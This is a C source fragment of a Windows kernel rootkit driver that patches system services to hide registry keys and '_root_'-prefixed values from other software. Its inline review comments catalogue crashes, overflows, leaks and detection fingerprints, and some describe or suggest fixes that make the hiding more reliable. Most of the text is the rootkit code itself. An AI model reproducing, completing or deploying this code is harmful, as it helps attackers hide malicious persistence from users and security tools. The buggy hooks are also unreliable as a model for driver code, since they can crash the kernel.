	rc = Real_ZwCreateKey (KeyHandle, DesiredAccess, ObjectAttributes,
		TitleIndex, Class, CreateOptions, Disposition);

	return rc;
}


/*
 * Hook of ZwOpenKey(): refuse to open keys that CheckKeyByName() classifies
 * as protected; every other open is forwarded to the saved original.
 *
 * Flow: build the full key path from ObjectAttributes (PathFromHandle),
 * normalise it to HKEY_* notation (AdjustKeyName), and if CheckKeyByName()
 * reports it as protected, return an error without calling the real
 * service.  PathFromHandle / CheckKeyByName / Real_ZwOpenKey are defined
 * elsewhere in the project.
 *
 * Review notes:
 *  - ObjectAttributes is dereferenced directly (RootDirectory, ObjectName)
 *    with no ProbeForRead and no __try/__except.  If HookSystemServiceByFn
 *    patches the system service table (as its name suggests), user-mode
 *    NtOpenKey callers land here too, and a bad pointer from such a caller
 *    faults in kernel mode instead of being rejected -- a local crash.
 *  - When the pool allocation fails the name check is skipped entirely and
 *    the open proceeds: protection degrades to "off" under pool pressure.
 *  - STATUS_NO_SUCH_FILE is a file-system status code; a missing registry
 *    key is normally reported as STATUS_OBJECT_NAME_NOT_FOUND.  The unusual
 *    code is a fingerprint a detector can look for.  *KeyHandle is left
 *    unwritten on that path.
 *  - ExAllocatePool is the untagged allocator, so pool-usage tracking cannot
 *    attribute these buffers (or leaks of them) to this driver.
 */
NTSTATUS Hook_ZwOpenKey (
	OUT PHANDLE KeyHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes
)
{
	NTSTATUS rc;
	PCHAR szFullName;

	
	/* Scratch buffer for the ANSI path; MAXPATHLEN is defined elsewhere. */
	szFullName = ExAllocatePool (PagedPool, MAXPATHLEN);
	if (szFullName != NULL) {
		/* Unprobed dereference of caller-supplied ObjectAttributes. */
		if (PathFromHandle (ObjectAttributes->RootDirectory, 
			ObjectAttributes->ObjectName, szFullName)) {
			AdjustKeyName (szFullName);
			if (CheckKeyByName (szFullName)) {
				/* Protected key: pretend it does not exist. */
				ExFreePool (szFullName);
				return STATUS_NO_SUCH_FILE;
			}
		}
		ExFreePool (szFullName);
	}

	/* Not protected (or the check could not run): pass through. */
	rc = Real_ZwOpenKey (KeyHandle, DesiredAccess, ObjectAttributes);

	return rc;
}


/*
 * Hook of ZwEnumerateKey(): let the real service fill the caller's buffer,
 * then inspect the returned sub-key name and, if <parent path>\<name> is
 * protected according to CheckKeyByName(), try to substitute the next entry.
 *
 * Flow: resolve the parent key path from KeyHandle before the real call,
 * call the original, then for the information classes that carry a name
 * (Basic / Node / Name) append the name to the parent path, normalise it
 * with AdjustKeyName() and test it.  KeyFullInformation carries no name and
 * is never filtered; unknown classes are only logged.
 *
 * Review notes (defects visible in this body):
 *  - rc is overwritten by RtlUnicodeStringToAnsiString().  If that
 *    conversion fails, the hook returns the conversion's failure status even
 *    though the real service succeeded and already filled the caller's
 *    buffer.  A separate status variable is needed.
 *  - On the "hidden" path the function returns without ExFreePool(),
 *    leaking szFullName (PagedPool, untagged) once per hidden entry.
 *  - The substitute call is Real_ZwEnumerateValueKey, i.e. the *value*
 *    enumerator, handed ZwEnumerateKey's argument list: a
 *    KEY_INFORMATION_CLASS where a KEY_VALUE_INFORMATION_CLASS is expected.
 *    The caller receives value data (or an error) in a key-information
 *    buffer.  Independently of that, only one entry is skipped here, and the
 *    caller's own next call at Index+1 returns the same entry again, so a
 *    hidden key surfaces as a duplicated neighbour -- detectable.
 *  - Name and NameLength are re-read from KeyInformation, the caller's
 *    buffer, after the real call with no probe or capture.  If the caller is
 *    user mode, it can change NameLength between the two reads (double
 *    fetch); the USHORT cast also truncates lengths >= 64K.
 *  - strcat() assumes PathFromHandle left at least one spare byte; if the
 *    path already fills MAXPATHLEN-1, MAXPATHLEN - 1 - strlen() wraps in the
 *    USHORT MaximumLength.  Whether PathFromHandle guarantees the slack is
 *    not visible here.
 */
NTSTATUS Hook_ZwEnumerateKey (
	IN HANDLE KeyHandle,
	IN ULONG Index,
	IN KEY_INFORMATION_CLASS KeyInformationClass,
	OUT PVOID KeyInformation,
	IN ULONG Length,
	OUT PULONG ResultLength
)
{
	NTSTATUS rc;
	PCHAR szFullName;
	PWCHAR pName = NULL;
	PULONG pulNameLen = NULL;
    //DbgPrint("zwenumeratekey called\n");
	/* Find the full name of the parent key; on failure szFullName becomes
	 * NULL and no filtering happens for this call. */
	szFullName = ExAllocatePool (PagedPool, MAXPATHLEN);
	if (szFullName != NULL) {
		if (!PathFromHandle (KeyHandle, NULL, szFullName)) {
			ExFreePool (szFullName);
			szFullName = NULL;
		}
	}

	/* The real service writes the entry into the caller's buffer first. */
	rc = Real_ZwEnumerateKey (KeyHandle, Index, KeyInformationClass,
		KeyInformation, Length, ResultLength);

	if (NT_SUCCESS (rc) && szFullName != NULL) {
		/* Locate the name field for the classes that have one. */
		switch (KeyInformationClass) {
		case KeyBasicInformation:
			pName = ((PKEY_BASIC_INFORMATION)KeyInformation)->Name;
			pulNameLen = &((PKEY_BASIC_INFORMATION)KeyInformation)->NameLength;
			break;
		case KeyNodeInformation:
			pName = ((PKEY_NODE_INFORMATION)KeyInformation)->Name;
			pulNameLen = &((PKEY_NODE_INFORMATION)KeyInformation)->NameLength;
			break;
		case KeyNameInformation:
			pName = ((PKEY_NAME_INFORMATION)KeyInformation)->Name;
			pulNameLen = &((PKEY_NAME_INFORMATION)KeyInformation)->NameLength;
			break;
		case KeyFullInformation:
			/* No name in this class: nothing to filter. */
			break;
		default:
			DbgPrint("Hook_ZwEnumerateKey(): unknown class %d",
				KeyInformationClass);
		}

		if (pName != NULL) {
			UNICODE_STRING us;
			ANSI_STRING as;

			/* Unbounded: relies on slack left by PathFromHandle. */
			strcat (szFullName, "\\");

			/* NameLength is a byte count; read from the caller's buffer. */
			us.Length = us.MaximumLength = (USHORT)*pulNameLen;
			us.Buffer = pName;
			as.Length = 0;
			as.MaximumLength = MAXPATHLEN - 1 - strlen (szFullName);
			as.Buffer = szFullName + strlen (szFullName);
			/* Clobbers the real service's status -- see header note. */
			rc = RtlUnicodeStringToAnsiString (&as, &us, FALSE);
			if (NT_SUCCESS (rc)) {
				as.Buffer[as.Length] = '\0';
				AdjustKeyName (szFullName);
				//DbgPrint(szFullName);
				if (CheckKeyByName (szFullName) ) 
				{
					//wcscpy (pName, L"temp");
					//*pulNameLen = 0;
                     Index++;
					// pName=NULL;
					 /* szFullName is leaked here, and this is the value
					  * enumerator, not the key enumerator -- see header. */
					 return Real_ZwEnumerateValueKey(KeyHandle, Index, KeyInformationClass,KeyInformation, Length, ResultLength);
				}
			}
		}
	}

	if (szFullName != NULL)
		ExFreePool (szFullName);

	return rc;
}


/*
 * Hook of ZwEnumerateValueKey(): hide registry values whose name begins
 * with L"_root_".  Marked "XXX not yet" by the original author; the body
 * below is debugging scaffolding plus a partial implementation.
 *
 * Flow: call the real service into the caller's buffer, and if it succeeded,
 * compare the returned value name against L"_root_" for the Basic and Full
 * classes; on a match report STATUS_NO_MORE_ENTRIES.  Otherwise call the
 * real service a second time with identical arguments and return its status.
 *
 * Review notes (defects visible in this body):
 *  - sprintf(name, "%S", Name) is a kernel stack overflow.  Name is not
 *    NUL-terminated (its length is NameLength bytes), so %S scans until a
 *    zero WCHAR happens to follow, and sprintf has no bound on name[100].
 *    Any user who can create a value with a long name under a key that gets
 *    enumerated reaches this line.
 *  - DbgPrint(name) passes caller-controlled data as the format string
 *    (format-string bug; "%" in a value name is interpreted).
 *  - The three local *Info structures are never passed to the real call.
 *    BasicInfo / FullInfo are dead; PartInfo.Data is compared while still
 *    uninitialised, so the KeyValuePartialInformation branch tests random
 *    stack bytes.  NewKeyValueInformation is assigned and never used.
 *  - The 12-byte memcmp() against L"_root_" is not guarded by NameLength,
 *    so it reads past a shorter name.
 *  - STATUS_NO_MORE_ENTRIES ends the whole enumeration at the matching
 *    index, so every value after the "hidden" one disappears as well.  The
 *    caller's buffer already holds the matched entry's data at that point;
 *    a caller that ignores the status still sees it.
 *  - The second real call re-fetches the same entry and overwrites the
 *    first status; it adds cost and nothing else.
 */
NTSTATUS Hook_ZwEnumerateValueKey (
	IN HANDLE  KeyHandle,
	IN ULONG  Index,
	IN KEY_VALUE_INFORMATION_CLASS  KeyValueInformationClass,
	OUT PVOID  KeyValueInformation,
	IN ULONG  Length,
	OUT PULONG  ResultLength
)
{
NTSTATUS ntStatus; 
PVOID NewKeyValueInformation; // set below but never read
PVOID KeyValueInfor;
KEY_VALUE_BASIC_INFORMATION BasicInfo; // never filled (dead)
KEY_VALUE_FULL_INFORMATION FullInfo; // never filled (dead)
KEY_VALUE_PARTIAL_INFORMATION PartInfo; // never filled, yet compared below
char name[100]; // fixed-size target of the unbounded sprintf below
char *ptr; // assigned, otherwise unused (old hex-dump loop is commented out)
int i; // unused

/* None of these pointers is ever used; the real call below writes into the
 * caller's KeyValueInformation, not into the local structures. */
if (KeyValueInformationClass == KeyValueBasicInformation)
NewKeyValueInformation = &BasicInfo;
if (KeyValueInformationClass == KeyValueFullInformation)
NewKeyValueInformation = &FullInfo;
if (KeyValueInformationClass == KeyValuePartialInformation )
NewKeyValueInformation = &PartInfo;


/* First real call: fills the caller's buffer and sets the status. */
ntStatus = ((T_ZwEnumerateValueKey)(Real_ZwEnumerateValueKey)) (
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength); 

if (NT_SUCCESS(ntStatus))
{

	
	
DbgPrint("enumerate value key!!\n"); 
if (KeyValueInformationClass == KeyValueBasicInformation)
{
KeyValueInfor=KeyValueInformation;
DbgPrint("basic!!\n");
//ptr=(char*)BasicInfo.Name;
//ptr=(char*)L"_root_";

/* NameLength is a byte count, not a character count. */
DbgPrint("namelength: %d",((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->NameLength);
ptr=(char*)((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->Name;
/* BUG: Name is not NUL-terminated and sprintf is unbounded -> name[100]
 * overflow on the kernel stack for long value names. */
sprintf(name,"%S",((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->Name);
/* BUG: caller-controlled data used as the format string. */
DbgPrint(name);
/*for(i=0;i<(int)((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->NameLength;i++)
{
DbgPrint("0x%02x",*ptr);
ptr++;
}
*/
/* 12 bytes = 6 WCHARs of L"_root_"; NameLength is not checked first. */
if (0 == memcmp(((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->Name,L"_root_",12))
{
DbgPrint("Got Value from reg!\n");
return STATUS_NO_MORE_ENTRIES; // ends the whole enumeration; buffer already filled
}
}
if (KeyValueInformationClass == KeyValueFullInformation)
{
DbgPrint("FullInformation Enumerated!!!!!");
KeyValueInfor=KeyValueInformation;


/* Same unguarded 12-byte compare as above. */
if (0 == memcmp(((KEY_VALUE_FULL_INFORMATION*)KeyValueInfor)->Name,L"_root_",12))
{
DbgPrint("Got Value from reg!\n");
return STATUS_NO_MORE_ENTRIES; // ends the whole enumeration; buffer already filled
}
}
if (KeyValueInformationClass == KeyValuePartialInformation)
{

/* BUG: PartInfo was never written by anything; this reads uninitialised
 * stack memory.  The partial class carries no name, only Data. */
if (0 == memcmp(PartInfo.Data,"_root_",6))
{
DbgPrint("Got Value from reg!\n");
return STATUS_NO_MORE_ENTRIES; // fake the result
}
}

// No "_root_" match: repeat the identical real call (redundant; the first
// result in the caller's buffer is simply rewritten with the same entry).
ntStatus = ((T_ZwEnumerateValueKey)(Real_ZwEnumerateValueKey)) (
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength); 


}

return ntStatus;
}


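/*
 * AdjustKeyName - rewrite a native registry path, in place, into the
 * HKEY_* notation users see (method taken from rootkit.com, per the
 * original author):
 *
 *   "\REGISTRY\USER\S<sid>\rest"  -> "HKEY_CURRENT_USER\rest"
 *   "\REGISTRY\USER\rest"         -> "HKEY_USERS\rest"
 *   "\REGISTRY\MACHINE\rest"      -> "HKEY_LOCAL_MACHINE\rest"
 *
 * A leading double backslash is collapsed to a single one first.  Prefix
 * matching is case-insensitive (_strnicmp); paths matching no prefix are
 * left untouched.  The result is what CheckKeyByName() is fed in the hooks.
 *
 * szKeyName: writable, NUL-terminated ANSI path; modified in place.
 *
 * Caveats:
 *  - Any "\REGISTRY\USER\S..." path becomes HKEY_CURRENT_USER regardless of
 *    which SID it names: the function has no notion of the calling user, so
 *    different users' hives collapse onto the same name.
 *  - The HKEY_LOCAL_MACHINE rewrite is one byte longer than the prefix it
 *    replaces (19 vs 18 characters), so the string grows by one byte.
 *    There is no length argument, so the caller must guarantee one byte of
 *    slack beyond the terminator (a MAXPATHLEN buffer must not be completely
 *    full when it gets here).  The other two rewrites shrink the string for
 *    any real SID / sub-key name.
 *
 * Fixes relative to the earlier version: the HKEY_USERS branch used
 * sizeof(HKU1) instead of sizeof(HKU1) - 1 and so dropped the first
 * character after the prefix; the HKEY_CURRENT_USER branch started its
 * strchr() two bytes past the matched prefix and could read beyond the
 * terminator of a 16- or 17-character input.  Both now index the same way
 * as the HKEY_LOCAL_MACHINE branch.
 */
VOID AdjustKeyName (PCHAR szKeyName)
{
#define HKUS1 "\\REGISTRY\\USER\\S"
#define HKUS2 "HKEY_CURRENT_USER\\"
#define HKU1  "\\REGISTRY\\USER\\"
#define HKU2  "HKEY_USERS\\"
#define HKM1  "\\REGISTRY\\MACHINE\\"
#define HKM2  "HKEY_LOCAL_MACHINE\\"
	PCHAR p;

	/* "\\REGISTRY..." -> "\REGISTRY...": strlen() bytes from offset 1
	 * include the terminator, so the result stays NUL-terminated. */
	if (_strnicmp (szKeyName, "\\\\", 2) == 0) {
		memmove (szKeyName, szKeyName + 1, strlen (szKeyName));
	}

	if (_strnicmp (szKeyName, HKUS1, sizeof(HKUS1) - 1) == 0) {
		/* Skip the SID: first backslash after the matched prefix.
		 * Offset sizeof(HKUS1)-1 is at worst the terminator itself. */
		p = strchr (szKeyName + sizeof(HKUS1) - 1, '\\');
		if (p == NULL)
			return;		/* bare hive root, nothing after the SID */
		p++;
		memmove (szKeyName + sizeof(HKUS2) - 1, p, strlen (p) + 1);
		memcpy (szKeyName, HKUS2, sizeof(HKUS2) - 1);
	} else if (_strnicmp (szKeyName, HKU1, sizeof(HKU1) - 1) == 0) {
		/* Keep everything after the prefix (previously off by one). */
		p = szKeyName + sizeof(HKU1) - 1;
		memmove (szKeyName + sizeof(HKU2) - 1, p, strlen (p) + 1);
		memcpy (szKeyName, HKU2, sizeof(HKU2) - 1);
	} else if (_strnicmp (szKeyName, HKM1, sizeof(HKM1) - 1) == 0) {
		p = szKeyName + sizeof(HKM1) - 1;
		/* Destination is one byte right of the source: the string
		 * grows by one -- see the slack caveat in the header. */
		memmove (szKeyName + sizeof(HKM2) - 1, p, strlen (p) + 1);
		memcpy (szKeyName, HKM2, sizeof(HKM2) - 1);
	}
}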

////////////////// Install the registry-related function hooks

/*
 * InstallRegistryHooks - redirect ZwCreateKey / ZwOpenKey / ZwEnumerateKey /
 * ZwEnumerateValueKey to the Hook_* functions above through
 * HookSystemServiceByFn() (defined elsewhere; presumably a system service
 * table patch, judging by the name -- confirm), storing whatever it returns
 * as the Real_* pointer the hook calls through.
 *
 * Return: always TRUE.  A failed hook is only DbgPrint'ed, so the caller
 * cannot tell that some services were left unhooked.
 *
 * Review notes:
 *  - Ordering race: each Real_* global is assigned only AFTER
 *    HookSystemServiceByFn() returns.  If the table is live as soon as it
 *    is patched, a call arriving in that window runs a Hook_* whose Real_*
 *    is still NULL and calls through a null function pointer.
 *  - No guard against a second install: Real_* would then presumably be
 *    overwritten with the Hook_* address itself and the hook would recurse.
 *  - Service-table patching is an x86-era technique; Kernel Patch
 *    Protection on x64 Windows bug-checks on such modifications.
 */
BOOLEAN InstallRegistryHooks (void)
{
	DbgPrint("InstallRegistryHooks() entry");

	/* Hook first, save the original second -- see the race note above. */
	Real_ZwCreateKey = (T_ZwCreateKey) HookSystemServiceByFn (
		ZwCreateKey, Hook_ZwCreateKey);
	if (Real_ZwCreateKey == NULL)
		DbgPrint("InstallRegistryHooks() couldn't hook ZwCreateKey()");

	Real_ZwOpenKey = (T_ZwOpenKey) HookSystemServiceByFn (
		ZwOpenKey, Hook_ZwOpenKey);
	if (Real_ZwOpenKey == NULL)
		DbgPrint("InstallRegistryHooks() couldn't hook ZwOpenKey()");

	Real_ZwEnumerateKey = (T_ZwEnumerateKey) HookSystemServiceByFn (
		ZwEnumerateKey, Hook_ZwEnumerateKey);
	if (Real_ZwEnumerateKey == NULL)
		DbgPrint("InstallRegistryHooks() couldn't hook ZwEnumerateKey()");

	Real_ZwEnumerateValueKey = (T_ZwEnumerateValueKey) HookSystemServiceByFn (
		ZwEnumerateValueKey, Hook_ZwEnumerateValueKey);
	if (Real_ZwEnumerateValueKey == NULL)
		DbgPrint("InstallRegistryHooks() couldn't hook ZwEnumerateValueKey()");

	DbgPrint("InstallRegistryHooks() exit");

	/* Unconditional: failures above are not reported to the caller. */
	return TRUE;
}

///////////////// Remove the registry function hooks

/*
 * RemoveRegistryHooks - put each saved Real_* address back in place of its
 * Hook_* function, for every hook that was installed (Real_* != NULL).
 *
 * Review notes:
 *  - The Real_* globals are not reset to NULL afterwards, so nothing later
 *    can tell that the hooks are gone, and a re-install cannot detect the
 *    stale pointers.
 *  - Nothing here waits for threads that are still executing inside a
 *    Hook_* body.  If the driver image is unloaded right after this call,
 *    such a thread returns into freed memory.  (The unload sequence lives
 *    in OnUnload, which is outside this file section.)
 *  - The return value of the restoring HookSystemServiceByFn() call is
 *    ignored, so a failed restore goes unnoticed.
 */
void RemoveRegistryHooks (void)
{
	DbgPrint("RemoveRegistryHooks() entry");

	if (Real_ZwCreateKey != NULL)
		HookSystemServiceByFn (ZwCreateKey, Real_ZwCreateKey);
	if (Real_ZwOpenKey != NULL)
		HookSystemServiceByFn (ZwOpenKey, Real_ZwOpenKey);
	if (Real_ZwEnumerateKey != NULL)
		HookSystemServiceByFn (ZwEnumerateKey, Real_ZwEnumerateKey);
	if (Real_ZwEnumerateValueKey != NULL)
		HookSystemServiceByFn (ZwEnumerateValueKey,
		Real_ZwEnumerateValueKey);

	DbgPrint("RemoveRegistryHooks() exit");
}


/*
 * DriverEntry - driver load entry point.  Registers OnUnload (defined
 * elsewhere) as the unload routine and installs the registry hooks.
 *
 * theDriverObject: driver object supplied by the I/O manager.
 * theRegistryPath: the driver's service key path; unused here.
 *
 * Return: always STATUS_SUCCESS.  InstallRegistryHooks() also always
 * returns TRUE, so a failure to hook never fails the load.
 *
 * Review note: the DbgPrint below announces the driver to any attached
 * kernel debugger or debug-output viewer -- a trivially observable
 * artifact.
 */
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
	DbgPrint("The rootkit has been loaded!\n");

	theDriverObject->DriverUnload  = OnUnload; 
	/* Return value ignored (it is unconditionally TRUE anyway). */
    InstallRegistryHooks();
 

	return STATUS_SUCCESS;
}
